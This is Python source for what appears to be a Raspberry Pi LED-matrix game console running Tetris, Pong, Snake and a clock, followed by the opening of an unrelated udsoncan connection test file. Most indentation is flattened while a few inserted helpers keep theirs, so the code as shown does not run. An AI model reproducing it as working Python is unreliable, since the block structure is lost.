server_thread.start()
print("Server loop running in thread:", server_thread.name)
currentScreen = SCREEN_TETRIS
#nextScreen = -1
clearScreen()
drawClock(COLORINDEX_GREEN)
clearScreen()
# if PI:
# show_message(MAX2719device, "Let's play", fill="white", font=proportional(CP437_FONT),scroll_delay=0.03)
while True:
updateStartScreen(currentScreen)
while myQueue.empty():
if not PI:
pollKeyboardInput()
time.sleep(.1)
updateScreen()
if not PI:
checkForQuit()
time.sleep(.1)
# use the down key as enter and right, left to toggle between start screens
event = myQueue.get()
if event.type == QKEYDOWN:
if (event.key == BUTTON_LEFT): # goto previous start screen
currentScreen-=1
if(currentScreen==0):
currentScreen=3
elif (event.key == BUTTON_RIGHT): # goto next start screen
currentScreen+=1
if(currentScreen==4):
currentScreen=1
elif (event.key == BUTTON_DOWN): # start a game
if(currentScreen==SCREEN_TETRIS):
runTetrisGame()
drawGameOverScreen()
elif(currentScreen==SCREEN_PONG):
runPongGame()
drawGameOverScreen()
elif(currentScreen==SCREEN_SNAKE):
runSnakeGame()
drawGameOverScreen()
elif (event.key == BUTTON_UP): # goto Clock
drawClock(COLORINDEX_GREEN)
terminate()
# gaming main routines #
def runPongGame():
down = 0
up = 1
left = 0
right = 1
lowerbarx = PIXEL_X//2
upperbarx = PIXEL_X//2
score1 = 0
score2 = 0
ballx = PIXEL_X//2
bally = PIXEL_Y//2
directiony = down
directionx = left
movingRightUpper = False
movingLeftUpper = False
movingRightLower = False
movingLeftLower = False
restart=False
lastLowerMoveSidewaysTime = time.time()
lastUpperMoveSidewaysTime = time.time()
while True: # main game loop for pong
if not PI:
pollKeyboardInput()
while not myQueue.empty():
event = myQueue.get()
if event.type == QKEYDOWN:
if (event.key == 0):
movingLeftLower = True
movingRightLower = False
elif (event.key == 1):
movingLeftLower = False
movingRightLower = True
elif (event.key == BUTTON_YELLOW):
movingLeftUpper = True
movingRightUpper = False
elif (event.key == BUTTON_GREEN):
movingLeftUpper = False
movingRightUpper = True
elif event.key == BUTTON_RED:
return
if event.type == QKEYUP:
if (event.key == 0):
movingLeftLower =False
elif (event.key == 1):
movingRightLower = False
elif (event.key == BUTTON_YELLOW):
movingLeftUpper = False
elif (event.key == BUTTON_GREEN):
movingRightUpper = False
if (movingLeftLower) and time.time() - lastLowerMoveSidewaysTime > MOVESIDEWAYSFREQ:
if lowerbarx >1:
lowerbarx-=1
lastLowerMoveSidewaysTime = time.time()
if (movingRightLower) and time.time() - lastLowerMoveSidewaysTime > MOVESIDEWAYSFREQ:
if lowerbarx <PIXEL_X-2:
lowerbarx+=1
lastLowerMoveSidewaysTime = time.time()
if (movingLeftUpper) and time.time() - lastUpperMoveSidewaysTime > MOVESIDEWAYSFREQ:
if upperbarx >1:
upperbarx-=1
lastUpperMoveSidewaysTime = time.time()
if (movingRightUpper) and time.time() - lastUpperMoveSidewaysTime > MOVESIDEWAYSFREQ:
if upperbarx <PIXEL_X-2:
upperbarx+=1
lastUpperMoveSidewaysTime = time.time()
if not PI:
checkForQuit()
if (directiony == up):
if (bally>1):
bally-=1
else:
if (abs(ballx-upperbarx)<2):
directiony = down
if (ballx==upperbarx+1):
if (directionx==left):
directionx=right
if (ballx==upperbarx-1):
if (directionx==right):
directionx=left
elif ((ballx-upperbarx==2) and (directionx==left)):
directionx=right
directiony = down
elif ((ballx-upperbarx==-2) and (directionx==right)):
directionx=left
directiony = down
else:
bally-=1
score1+=1
restart = True
else:
if (bally<PIXEL_Y-2):
bally+=1
else:
if (abs(ballx-lowerbarx)<2):
directiony = up
if (ballx==lowerbarx+1):
if (directionx==left):
directionx=right
if (ballx==lowerbarx-1):
if (directionx==right):
directionx=left
elif ((ballx-lowerbarx==2) and (directionx==left)):
directionx=right
directiony = up
elif ((ballx-lowerbarx==-2) and (directionx==right)):
directionx=left
directiony = up
else:
bally+=1
score2+=1
restart = True
if (directionx == left):
if (ballx>0):
ballx-=1
else:
directionx = right
ballx+=1
if(directiony == up):
if(bally>2):
bally-=1
if(directiony == down):
if(bally<PIXEL_Y-2):
bally+=1
else:
if (ballx<PIXEL_X-1):
ballx+=random.randint(1,2)
else:
directionx = left
ballx-=random.randint(1,2)
if(directiony == up):
if(bally>3):
bally-=random.randint(0,2)
if(directiony == down):
if(bally<PIXEL_Y-3):
bally+=random.randint(0,2)
clearScreen()
drawBall(ballx,bally)
drawBar(upperbarx,0)
drawBar(lowerbarx,PIXEL_Y-1)
#twoscoreText(score1,score2)
updateScoreDisplayPong(score1,score2,MAX2719device)
updateScreen()
if (score1 == 9) or (score2 == 9):
time.sleep(3)
return
if restart:
time.sleep(1)
ballx=PIXEL_X//2
bally=PIXEL_Y//2
if directiony==down:
directiony = up
else:
directiony = down
restart=False
else:
time.sleep(.1)
def runSnakeGame():
# Set a random start point.
startx = random.randint(2, BOARDWIDTH-2 )
starty = random.randint(2, BOARDHEIGHT -2 )
wormCoords = [{'x': startx, 'y': starty},
{'x': startx - 1, 'y': starty},
{'x': startx - 2, 'y': starty}]
direction = RIGHT
score = 0
# Start the apple in a random place.
apple = getRandomLocation()
while True: # main game loop
if not PI:
pollKeyboardInput()
if not myQueue.empty():
event = myQueue.get()
# take only one input per run
while not myQueue.empty():
myQueue.get()
if event.type == QKEYDOWN:
if (event.key == 0) and direction != RIGHT:
direction = LEFT
elif (event.key == 1) and direction != LEFT:
direction = RIGHT
elif (event.key == 2) and direction != DOWN:
direction = UP
elif (event.key == 3) and direction != UP:
direction = DOWN
elif (event.key == BUTTON_RED):
return
# check if the worm has hit itself or the edge
if wormCoords[HEAD]['x'] == -1 or wormCoords[HEAD]['x'] == BOARDWIDTH or wormCoords[HEAD]['y'] == -1 or wormCoords[HEAD]['y'] == BOARDHEIGHT:
time.sleep(1.5)
return # game over
for wormBody in wormCoords[1:]:
if wormBody['x'] == wormCoords[HEAD]['x'] and wormBody['y'] == wormCoords[HEAD]['y']:
time.sleep(1.5)
return # game over
# check if worm has eaten an apple
if wormCoords[HEAD]['x'] == apple['x'] and wormCoords[HEAD]['y'] == apple['y']:
# don't remove worm's tail segment
score += 1
apple = getRandomLocation() # set a new apple somewhere
else:
del wormCoords[-1] # remove worm's tail segment
# move the worm by adding a segment in the direction it is moving
if direction == UP:
if wormCoords[HEAD]['y'] == 0 :
newHead = {'x': wormCoords[HEAD]['x'], 'y': BOARDHEIGHT-1}
else:
newHead = {'x': wormCoords[HEAD]['x'], 'y': wormCoords[HEAD]['y'] - 1}
elif direction == DOWN:
if wormCoords[HEAD]['y'] == BOARDHEIGHT-1 :
newHead = {'x': wormCoords[HEAD]['x'], 'y': 0}
else:
newHead = {'x': wormCoords[HEAD]['x'], 'y': wormCoords[HEAD]['y'] + 1}
elif direction == LEFT:
if wormCoords[HEAD]['x'] == 0 :
newHead = {'x': BOARDWIDTH -1, 'y': wormCoords[HEAD]['y'] }
else:
newHead = {'x': wormCoords[HEAD]['x'] - 1, 'y': wormCoords[HEAD]['y']}
elif direction == RIGHT:
if wormCoords[HEAD]['x'] == BOARDWIDTH-1:
newHead = {'x': 0, 'y': wormCoords[HEAD]['y']}
else:
newHead = {'x': wormCoords[HEAD]['x'] + 1, 'y': wormCoords[HEAD]['y']}
if not PI:
checkForQuit()
wormCoords.insert(0, newHead)
clearScreen()
drawWorm(wormCoords)
drawApple(apple)
updateScoreDisplaySnake(score,MAX2719device)
#scoreText(score)
updateScreen()
time.sleep(.15)
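# --- Added aside (illustrative only, not called by the game) -------------------
# The explicit edge checks in runSnakeGame() implement a torus wrap; the same
# head move can be written compactly with modulo arithmetic:
def _wrapMove(head, direction):
    dx = {LEFT: -1, RIGHT: 1}.get(direction, 0)
    dy = {UP: -1, DOWN: 1}.get(direction, 0)
    return {'x': (head['x'] + dx) % BOARDWIDTH, 'y': (head['y'] + dy) % BOARDHEIGHT}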
def runTetrisGame():
# setup variables for the start of the game
if PI:
#MAX2719device.brightness(1)
#MAX2719device.flush()
MAX2719device.clear()
board = getBlankBoard()
lastMoveDownTime = time.time()
lastMoveSidewaysTime = time.time()
lastFallTime = time.time()
movingDown = False # note: there is no movingUp variable
movingLeft = False
movingRight = False
score = 0
oldscore = -1
oldpiece = 10
lines = 0
level, fallFreq = calculateLevelAndFallFreq(lines)
fallingPiece = getNewPiece()
nextPiece = getNewPiece()
# tetris listens to the keys
# 0: Left --> move tile left
# 1: Right --> move tile right
# 2: Up --> rotate tile
# 3: Down --> move tile down
# 4: Button-Blue --> drop down
# 5: BUTTON_GREEN --> rotates in other direction
# 7: BUTTON_YELLOW --> ????
while True: # game loop
#if not myQueue.empty():
# print(myQueue.get().type)
if fallingPiece == None:
# No falling piece in play, so start a new piece at the top
fallingPiece = nextPiece
nextPiece = getNewPiece()
lastFallTime = time.time() # reset lastFallTime
if not isValidPosition(board, fallingPiece):
time.sleep(2)
return # can't fit a new piece on the board, so game over
if not PI:
pollKeyboardInput()
checkForQuit()
while not myQueue.empty():
event = myQueue.get()
if event.type == QKEYUP:
if (event.key == BUTTON_YELLOW):# TODO - what does this do?
lastFallTime = time.time()
lastMoveDownTime = time.time()
lastMoveSidewaysTime = time.time()
elif (event.key == BUTTON_LEFT):
movingLeft = False
elif (event.key == BUTTON_RIGHT):
movingRight = False
elif (event.key == BUTTON_DOWN):
movingDown = False
elif event.type == QKEYDOWN:
# moving the piece sideways
if (event.key == BUTTON_LEFT) and isValidPosition(board, fallingPiece, adjX=-1):
fallingPiece['x'] -= 1
movingLeft = True
movingRight = False
lastMoveSidewaysTime = time.time()
elif (event.key == BUTTON_RIGHT) and isValidPosition(board, fallingPiece, adjX=1):
fallingPiece['x'] += 1
movingRight = True
movingLeft = False
lastMoveSidewaysTime = time.time()
# rotating the piece (if there is room to rotate)
elif (event.key == BUTTON_UP):
fallingPiece['rotation'] = (fallingPiece['rotation'] + 1) % len(PIECES[fallingPiece['shape']])
if not isValidPosition(board, fallingPiece):
fallingPiece['rotation'] = (fallingPiece['rotation'] - 1) % len(PIECES[fallingPiece['shape']])
elif (event.key == BUTTON_GREEN): # rotate the other direction
fallingPiece['rotation'] = (fallingPiece['rotation'] - 1) % len(PIECES[fallingPiece['shape']])
if not isValidPosition(board, fallingPiece):
fallingPiece['rotation'] = (fallingPiece['rotation'] + 1) % len(PIECES[fallingPiece['shape']])
# making the piece fall faster with the down key
elif (event.key == BUTTON_DOWN):
movingDown = True
if isValidPosition(board, fallingPiece, adjY=1):
fallingPiece['y'] += 1
lastMoveDownTime = time.time()
# move the current piece all the way down
elif event.key == BUTTON_BLUE:
movingDown = False
movingLeft = False
movingRight = False
for i in range(1, BOARDHEIGHT):
if not isValidPosition(board, fallingPiece, adjY=i):
break
score+=i #TODO: more digits on numbercounter, more scores
fallingPiece['y'] += i - 1
# handle moving the piece because of user input
if (movingLeft or movingRight) and time.time() - lastMoveSidewaysTime > MOVESIDEWAYSFREQ:
if movingLeft and isValidPosition(board, fallingPiece, adjX=-1):
fallingPiece['x'] -= 1
elif movingRight and isValidPosition(board, fallingPiece, adjX=1):
fallingPiece['x'] += 1
lastMoveSidewaysTime = time.time()
if movingDown and time.time() - lastMoveDownTime > MOVEDOWNFREQ and isValidPosition(board, fallingPiece, adjY=1):
fallingPiece['y'] += 1
lastMoveDownTime = time.time()
# let the piece fall if it is time to fall
if time.time() - lastFallTime > fallFreq:
# see if the piece has landed
if not isValidPosition(board, fallingPiece, adjY=1):
# falling piece has landed, set it on the board
addToBoard(board, fallingPiece)
remLine = removeCompleteLines(board)
# count lines for level calculation
lines += remLine
# more lines, more points per line
score += SCORES[remLine]*level
level, fallFreq = calculateLevelAndFallFreq(lines)
fallingPiece = None
else:
# piece did not land, just move the piece down
fallingPiece['y'] += 1
lastFallTime = time.time()
# drawing everything on the screen
clearScreen()
drawBoard(board)
#scoreText(score)
if score>oldscore:
updateScoreDisplayTetris(score,level,PIECES_ORDER.get(nextPiece['shape']),MAX2719device)
oldscore = score
if oldpiece!=PIECES_ORDER.get(nextPiece['shape']):
updateScoreDisplayTetris(score,level,PIECES_ORDER.get(nextPiece['shape']),MAX2719device)
oldpiece=PIECES_ORDER.get(nextPiece['shape'])
#drawStatus(score, level)
#drawNextPiece(nextPiece)
if fallingPiece != None:
drawPiece(fallingPiece)
updateScreen()
#FPSCLOCK.tick(FPS)
time.sleep(.05)
def drawStartScreenTetris():
drawPixel(8,15,COLORINDEX_RED)
drawPixel(8,16,COLORINDEX_RED)
drawPixel(8,17,COLORINDEX_RED)
drawPixel(8,18,COLORINDEX_RED)
drawPixel(6,18,COLORINDEX_BLUE)
drawPixel(7,16,COLORINDEX_BLUE)
drawPixel(7,17,COLORINDEX_BLUE)
drawPixel(7,18,COLORINDEX_BLUE)
drawPixel(4,17,COLORINDEX_YELLOW)
drawPixel(3,18,COLORINDEX_YELLOW)
drawPixel(4,18,COLORINDEX_YELLOW)
drawPixel(5,18,COLORINDEX_YELLOW)
drawPixel(2,18,COLORINDEX_GREEN)
drawPixel(2,17,COLORINDEX_GREEN)
drawPixel(3,17,COLORINDEX_GREEN)
drawPixel(3,16,COLORINDEX_GREEN)
def drawStartScreenPong():
drawPixel(4,8,COLORINDEX_GREEN)
drawPixel(5,8,COLORINDEX_GREEN)
drawPixel(6,8,COLORINDEX_GREEN)
drawPixel(6,11,COLORINDEX_BLUE)
drawPixel(5,13,COLORINDEX_GREEN)
drawPixel(6,13,COLORINDEX_GREEN)
drawPixel(7,13,COLORINDEX_GREEN)
def drawStartScreenSnake():
drawPixel(5,3,COLORINDEX_RED)
drawPixel(6,3,COLORINDEX_GREEN)
drawPixel(7,3,COLORINDEX_GREEN)
drawPixel(8,3,COLORINDEX_GREEN)
drawPixel(8,2,COLORINDEX_GREEN)
drawPixel(8,1,COLORINDEX_GREEN)
# display the game over screen, show the points at end of game
def drawGameOverScreen():
while not myQueue.empty():
myQueue.get()
clearScreen()
#E
drawPixel(3,1,COLORINDEX_RED)
drawPixel(4,1,COLORINDEX_RED)
drawPixel(5,1,COLORINDEX_RED)
drawPixel(6,1,COLORINDEX_RED)
drawPixel(3,2,COLORINDEX_RED)
drawPixel(3,3,COLORINDEX_RED)
drawPixel(4,3,COLORINDEX_RED)
drawPixel(5,3,COLORINDEX_RED)
drawPixel(3,4,COLORINDEX_RED)
drawPixel(3,5,COLORINDEX_RED)
drawPixel(4,5,COLORINDEX_RED)
drawPixel(5,5,COLORINDEX_RED)
drawPixel(6,5,COLORINDEX_RED)
#N
drawPixel(3,7,COLORINDEX_RED)
drawPixel(3,8,COLORINDEX_RED)
drawPixel(3,9,COLORINDEX_RED)
drawPixel(3,10,COLORINDEX_RED)
drawPixel(3,11,COLORINDEX_RED)
drawPixel(4,8,COLORINDEX_RED)
drawPixel(5,9,COLORINDEX_RED)
drawPixel(6,7,COLORINDEX_RED)
drawPixel(6,8,COLORINDEX_RED)
drawPixel(6,9,COLORINDEX_RED)
drawPixel(6,10,COLORINDEX_RED)
drawPixel(6,11,COLORINDEX_RED)
#D
drawPixel(3,13,COLORINDEX_RED)
drawPixel(3,14,COLORINDEX_RED)
drawPixel(3,15,COLORINDEX_RED)
drawPixel(3,16,COLORINDEX_RED)
drawPixel(3,17,COLORINDEX_RED)
drawPixel(4,13,COLORINDEX_RED)
drawPixel(5,13,COLORINDEX_RED)
drawPixel(4,17,COLORINDEX_RED)
drawPixel(5,17,COLORINDEX_RED)
drawPixel(6,14,COLORINDEX_RED)
drawPixel(6,15,COLORINDEX_RED)
drawPixel(6,16,COLORINDEX_RED)
updateScreen()
time.sleep(0.5)
while True:
if not PI:
checkForQuit()
pollKeyboardInput()
while not myQueue.empty():
event = myQueue.get()
if event.type == QKEYDOWN:
if PI:
MAX2719device.clear()
return
def updateStartScreen(currentScreen):
clearScreen()
if currentScreen==SCREEN_TETRIS:
drawStartScreenTetris()
elif currentScreen==SCREEN_PONG:
drawStartScreenPong()
elif currentScreen==SCREEN_SNAKE:
drawStartScreenSnake()
def drawSymbols():
    # snake symbol
drawPixel(1,2,0)
drawPixel(2,2,0)
drawPixel(1,3,0)
drawPixel(1,4,0)
drawPixel(2,3,0)
drawPixel(2,4,0)
drawPixel(5,3,2)
drawPixel(6,3,1)
drawPixel(7,3,1)
drawPixel(8,3,1)
drawPixel(8,2,1)
drawPixel(8,1,1)
#pong symbol
drawPixel(1,9,2)
drawPixel(2,9,2)
drawPixel(1,10,2)
drawPixel(2,10,2)
drawPixel(1,11,2)
drawPixel(2,11,2)
drawPixel(5,9,1)
drawPixel(6,9,1)
drawPixel(7,9,1)
drawPixel(6,11,0)
#tetris symbol
drawPixel(1,16,3)
drawPixel(2,16,3)
drawPixel(1,17,3)
drawPixel(1,18,3)
drawPixel(2,17,3)
drawPixel(2,18,3)
drawPixel(7,16,0)
drawPixel(6,16,0)
drawPixel(6,17,0)
drawPixel(6,18,0)
#TODO separate drawing and control flow
#draws a clock on the main screen with or without seconds
#color -
def drawClock(color):
if PI:
MAX2719device.clear()
lastExecutiontime = time.localtime(0)
CLK_MODE_DEFAULT = 0 # 24h, no seconds
CLK_MODE_SECONDS =1 # 24h, with seconds
CLK_MODE_PARTY = 2 # Random Background
CLK_MODE_PARTYTIME = 3
clockMode = CLK_MODE_DEFAULT
while True:
if not PI:
pollKeyboardInput()
while not myQueue.empty():
event = myQueue.get()
if event.type == QKEYDOWN:
if event.key == BUTTON_RED: # toggle different clock modes
clockMode+=1
if clockMode==4:
clockMode=0
else:
return
if not PI:
checkForQuit()
now = time.localtime()
if (time.mktime(now)-time.mktime(lastExecutiontime)>0) :
hour = now.tm_hour
minute= now.tm_min
second= now.tm_sec
clearScreen()
if(clockMode==CLK_MODE_PARTY or clockMode==CLK_MODE_PARTYTIME):
#color=7
for x in range(PIXEL_X):
for y in range(PIXEL_Y):
drawPixelRgb(x,y,randint(0,255),randint(0,255), randint(0,255))
time.sleep(0.001) #TODO saw some data loss without a delay
if(clockMode==CLK_MODE_DEFAULT):
drawnumber(int(hour/10),2,3,color)
drawnumber(int(hour%10),6,3,color)
drawnumber(int(minute/10),2,10,color)
drawnumber(int(minute%10),6,10,color)
elif(clockMode==CLK_MODE_SECONDS):
drawnumber(int(hour/10),2,1,color)
drawnumber(int(hour%10),6,1,color)
drawnumber(int(minute/10),2,8,color)
drawnumber(int(minute%10),6,8,color)
drawnumber(int(second/10),2,15,color)
drawnumber(int(second%10),6,15,color)
elif(clockMode==CLK_MODE_PARTYTIME):
drawnumber(int(hour/10),2,1,8)
drawnumber(int(hour%10),6,1,8)
drawnumber(int(minute/10),2,8,8)
drawnumber(int(minute%10),6,8,8)
drawnumber(int(second/10),2,15,8)
drawnumber(int(second%10),6,15,8)
updateScreen()
time.sleep(.2)
def drawImage(filename):
im = Image.open(filename)
for row in range(0,BOARDHEIGHT):
for col in range(0,BOARDWIDTH):
r,g,b = im.getpixel((col,row))
drawPixelRgb(col,row,r,g,b)
updateScreen()
def drawHalfImage(filename,offset):
im = Image.open(filename)
if offset>10:
offset = 10
for row in range(0,10):
for col in range(0,10):
r,g,b = im.getpixel((col,row))
drawPixelRgb(col,row+offset,r,g,b)
# drawing #
def clearScreen():
if PI:
serport.write(bytearray([COMMANDBYTE_CLEARSCREEN]))
else:
DISPLAYSURF.fill(BGCOLOR)
def updateScreen():
if PI:
serport.write(bytearray([COMMANDBYTE_UPDATESCREEN]))
else:
pygame.display.update()
def drawPixel(x,y,color):
if color == BLANK:
return
if PI:
if (x>=0 and y>=0 and color >=0):
serport.write(bytearray([COMMANDBYTE_DRAWPIXELCOLOR,x,y,color]))
else:
pygame.draw.rect(DISPLAYSURF, COLORS[color], (x*SIZE+1, y*SIZE+1, SIZE-2, SIZE-2))
def drawPixelRgb(x,y,r,g,b):
if PI:
if (x>=0 and y>=0):
serport.write(bytearray([COMMANDBYTE_DRAWPIXELRGB,x,y,r,g,b]))
else:
pygame.draw.rect(DISPLAYSURF, (r,g,b), (x*SIZE+1, y*SIZE+1, SIZE-2, SIZE-2))
def drawnumber(number,offsetx,offsety,color):
for x in range(0,3):
for y in range(0,5):
if clock_font[3*number + x]&mask[y]:
drawPixel(offsetx+x,offsety+y,color)
def makeTextObjs(text, font, color):
surf = font.render(text, True, color)
return surf, surf.get_rect()
def scrollText(text):
if PI:
show_message(MAX2719device, text, fill="white", font=proportional(CP437_FONT))
#MAX2719device.show_message(text, font=proportional(CP437_FONT))
else:
titleSurf, titleRect = makeTextObjs(str(text), BASICFONT, TEXTCOLOR)
titleRect.center = (int(WINDOWWIDTH / 2) - 3, int(WINDOWHEIGHT / 2) - 3)
DISPLAYSURF.blit(titleSurf, titleRect)
# inserts a colon on the MAX7219 secondary display
# x - x coordinate on the display (0,0) is the left upper corner
# y - y coordinate on the display (0,0) is the left upper corner
# drawCanvas - the MAX7219 draw canvas
def scoreDisplayInsertColon(x,y,drawCanvas):
drawCanvas.point((x,y+1), fill= "white")
drawCanvas.point((x,y+3), fill= "white")
#TODO provide a pygame version of display
# inserts a single digit on the MAX7219 secondary display
# number - digit to insert
# x - x coordinate on the display (0,0) is the left upper corner
# y - y coordinate on the display (0,0) is the left upper corner
# drawCanvas - the MAX7219 draw canvas
def scoreDisplayInsertDigit(number,x,y,drawCanvas):
# font clock #
# 3x5 point font
# each row is a digit
# each byte represents the vertical lines in binary
clock_font = [
0x1F, 0x11, 0x1F, #0
0x00, 0x00, 0x1F, #1
0x1D, 0x15, 0x17, #2
0x15, 0x15, 0x1F, #3
0x07, 0x04, 0x1F, #4
0x17, 0x15, 0x1D, #5
0x1F, 0x15, 0x1D, #6
0x01, 0x01, 0x1F, #7
0x1F, 0x15, 0x1F, #8
0x17, 0x15, 0x1F] #9
for column in range(3): # 3 columns
for row in range(5): # 5 rows
if((clock_font[3*number+column]>>row)&0x01==0x01):
drawCanvas.point((x+column,y+row), fill= "white")
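# --- Added helper (illustrative only, not used by the games) -------------------
# Renders one 3x5 digit from the module-level clock_font to ASCII so the
# column-byte encoding documented above is easy to verify in a terminal.
def _asciiDigit(number):
    lines = []
    for row in range(5):
        line = ''
        for column in range(3):
            bit = (clock_font[3 * number + column] >> row) & 0x01
            line += '#' if bit else '.'
        lines.append(line)
    return '\n'.join(lines)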
# inserts the next tetris piece on the MAX7219 canvas
# nextPieceIndex - index of next piece to insert
# x - x coordinate on the display (0,0) is the left upper corner
# y - y coordinate on the display (0,0) is the left upper corner
# drawCanvas - the MAX7219 draw canvas
def scoreDisplayInsertNextPiece(nextPieceIndex,x,y,drawCanvas):
    # tetris piece font #
# 4x8 point font
# each row is a symbol
# each byte represents the vertical lines in binary
theTetrisFont = [
0x1E,0x1E,0x78,0x78, #Z
0x78,0x78,0x1E,0x1E, #S
0x00,0xFF,0xFF,0x00, #I
0x7E,0x7E,0x06,0x06, #L
0x06,0x06,0x7E,0x7E, #J
0x3C,0x3C,0x3C,0x3C, #O
0x7E,0x7E,0x18,0x18, #T
]
for column in range(4): # 4 columns
        for row in range(8): # 8 rows
if((theTetrisFont[4*nextPieceIndex+column]>>row)&0x01==0x01):
drawCanvas.point((x+column,y+row), fill= "white")
# displays the score on the secondary screen for Snake
# score - score of player
# dev - the MAX7219 device
def updateScoreDisplaySnake(score,dev):
_score=score
if _score>9999: # not more than 4 digits for score
_score = 9999
if PI:
with canvas(dev) as draw:
for digit in range(4):
# start with the smallest digit at the right side; 32 pixel display
scoreDisplayInsertDigit(_score%10,29-4*digit,0,draw)
_score //=10
else:
titleSurf, titleRect = makeTextObjs(str(_score), BASICFONT, TEXTCOLOR)
titleRect.center = (int(WINDOWWIDTH / 2) - 3, int(WINDOWHEIGHT / 2) - 3)
DISPLAYSURF.blit(titleSurf, titleRect)
# displays the score on the secondary screen for Tetris
# score - score of player
# level - current level
# nextPiece - index of next piece
# dev - the MAX7219 device
def updateScoreDisplayTetris(score,level,nextPiece,dev):
_score=score
if _score>999999: # not more than 6 digits for score
_score = 999999
# score as 6 digit value
if PI:
with canvas(dev) as draw:
# two point per level? TODO what is the maximum level???
for i in range(level):# insert level bar; 6 pixel offset to display next piece
draw.point((2*i+6,7), fill= "white")
draw.point((2*i+7,7), fill= "white")
for digit in range(6):
# start with the smallest digit at the right side; 32 pixel display
scoreDisplayInsertDigit(_score%10,29-4*digit,0,draw)
_score //=10
scoreDisplayInsertNextPiece(nextPiece,0,0,draw)
#displays the score on the secondary screen for pong
# score1 - score of player1
# score2 - score of player2
# dev - the MAX7219 device
def updateScoreDisplayPong(score1,score2,dev):
_score1=score1
if _score1>9: # not more than 1 digit for score
_score1 = 9
_score2=score2
if _score2>9: # not more than 1 digit for score
_score2 = 9
if PI:
with canvas(dev) as draw:
scoreDisplayInsertDigit(_score2,29,0,draw)
scoreDisplayInsertDigit(0,25,0,draw)
scoreDisplayInsertColon(22,0,draw)
scoreDisplayInsertDigit(_score1,17,0,draw)
scoreDisplayInsertDigit(0,13,0,draw)
else:
titleSurf, titleRect = makeTextObjs(str(_score1)+':'+str(_score2), BASICFONT, TEXTCOLOR)
titleRect.center = (int(WINDOWWIDTH / 2) - 3, int(WINDOWHEIGHT / 2) - 3)
DISPLAYSURF.blit(titleSurf, titleRect)
# program flow #
def terminate():
    global RUNNING
    RUNNING = False
if not PI:
pygame.quit()
sys.exit()
def checkForQuit():
for event in pygame.event.get(QUIT): # get all the QUIT events
terminate() # terminate if any QUIT events are present
for event in pygame.event.get(KEYUP): # get all the KEYUP events
if event.key == K_ESCAPE:
terminate() # terminate if the KEYUP event was for the Esc key
pygame.event.post(event) # put the other KEYUP event objects back
# tetris subroutines #
def calculateLevelAndFallFreq(lines):
    # Based on the number of lines cleared, return the level the player is on
    # and how many seconds pass until a falling piece falls one space.
level = int(lines / 10) + 1
# limit level to 10
if level >10:
level = 10
fallFreq = FALLING_SPEED - (level * 0.05)
if fallFreq <= 0.05:
fallFreq = 0.05
return level, fallFreq
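# Worked example (comment only; FALLING_SPEED is defined elsewhere in this
# file): with 25 cleared lines, level = int(25 / 10) + 1 = 3 and
# fallFreq = FALLING_SPEED - 3 * 0.05, i.e. each level shaves 0.05s off the
# fall interval until the 0.05s floor is reached.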
def getNewPiece():
# return a random new piece in a random rotation and color
shape = random.choice(list(PIECES.keys()))
newPiece = {'shape': shape,
'rotation': random.randint(0, len(PIECES[shape]) - 1),
'x': int(BOARDWIDTH / 2) - int(TEMPLATEWIDTH / 2),
'y': -2, # start it above the board (i.e. less than 0)
'color': PIECES_ORDER.get(shape)}
return newPiece
def addToBoard(board, piece):
# fill in the board based on piece's location, shape, and rotation
for x in range(TEMPLATEWIDTH):
for y in range(TEMPLATEHEIGHT):
if PIECES[piece['shape']][piece['rotation']][y][x] != BLANK:
board[x + piece['x']][y + piece['y']] = piece['color']
def isOnBoard(x, y):
    return 0 <= x < BOARDWIDTH and y < BOARDHEIGHT
def isValidPosition(board, piece, adjX=0, adjY=0):
# Return True if the piece is within the board and not colliding
for x in range(TEMPLATEWIDTH):
for y in range(TEMPLATEHEIGHT):
isAboveBoard = y + piece['y'] + adjY < 0
if isAboveBoard or PIECES[piece['shape']][piece['rotation']][y][x] == BLANK:
continue
if not isOnBoard(x + piece['x'] + adjX, y + piece['y'] + adjY):
return False
if board[x + piece['x'] + adjX][y + piece['y'] + adjY] != BLANK:
return False
return True
def isCompleteLine(board, y):
    # Return True if the line is completely filled with boxes, with no gaps.
for x in range(BOARDWIDTH):
if board[x][y] == BLANK:
return False
return True
def removeCompleteLines(board):
# Remove any completed lines on the board, move everything above them down, and return the number of complete lines.
numLinesRemoved = 0
y = BOARDHEIGHT - 1 # start y at the bottom of the board
while y >= 0:
if isCompleteLine(board, y):
# Remove the line and pull boxes down by one line.
for pullDownY in range(y, 0, -1):
for x in range(BOARDWIDTH):
board[x][pullDownY] = board[x][pullDownY-1]
# Set very top line to blank.
for x in range(BOARDWIDTH):
board[x][0] = BLANK
numLinesRemoved += 1
# Note on the next iteration of the loop, y is the same.
# This is so that if the line that was pulled down is also
# complete, it will be removed.
else:
y -= 1 # move on to check next row up
return numLinesRemoved
def drawBoard(matrix):
for i in range(0,BOARDWIDTH):
for j in range(0,BOARDHEIGHT):
drawPixel(i,j,matrix[i][j])
def getBlankBoard():
# create and return a new blank board data structure
board = []
for i in range(BOARDWIDTH):
board.append([BLANK] * BOARDHEIGHT)
return board
def drawPiece(piece, pixelx=None, pixely=None):
shapeToDraw = PIECES[piece['shape']][piece['rotation']]
    if pixelx is None and pixely is None:
        # if pixelx & pixely haven't been specified, use the location stored in the piece data structure
pixelx=piece['x']
pixely=piece['y']
# draw each of the boxes that make up the piece
for x in range(TEMPLATEWIDTH):
for y in range(TEMPLATEHEIGHT):
if shapeToDraw[y][x] != BLANK:
drawPixel( pixelx+ x , pixely+y,piece['color'])
# snake subroutines #
def getRandomLocation():
return {'x': random.randint(0, BOARDWIDTH - 1), 'y': random.randint(0, BOARDHEIGHT - 1)}
def drawWorm(wormCoords):
for coord in wormCoords:
x = coord['x']
y = coord['y']
drawPixel(x,y,1)
def drawApple(coord):
x = coord['x']
y = coord['y']
drawPixel(x,y,2)
# pong subroutines #
def drawBar(x,y):
drawPixel(x-1,y,1)
drawPixel(x,y,1)
drawPixel(x+1,y,1)
def drawBall(x,y):
drawPixel(x,y,0)
if __name__ == '__main__':
main()
|
test_connection.py | from test.UdsTest import UdsTest
from udsoncan.connections import *
from test.stub import StubbedIsoTPSocket
import socket
import threading
import time
import unittest
try:
    _STACK_UNAVAILABLE_REASON = ''
_interface_name = 'vcan0'
import isotp
import can
s = isotp.socket()
s.bind(_interface_name,rxid=1,txid=2)
s.close()
_STACK_POSSIBLE = True
except Exception as e:
    _STACK_UNAVAILABLE_REASON = str(e)
_STACK_POSSIBLE = False
class TestIsoTPSocketConnection(UdsTest):
def setUp(self):
self.tpsock1 = StubbedIsoTPSocket(timeout=0.1)
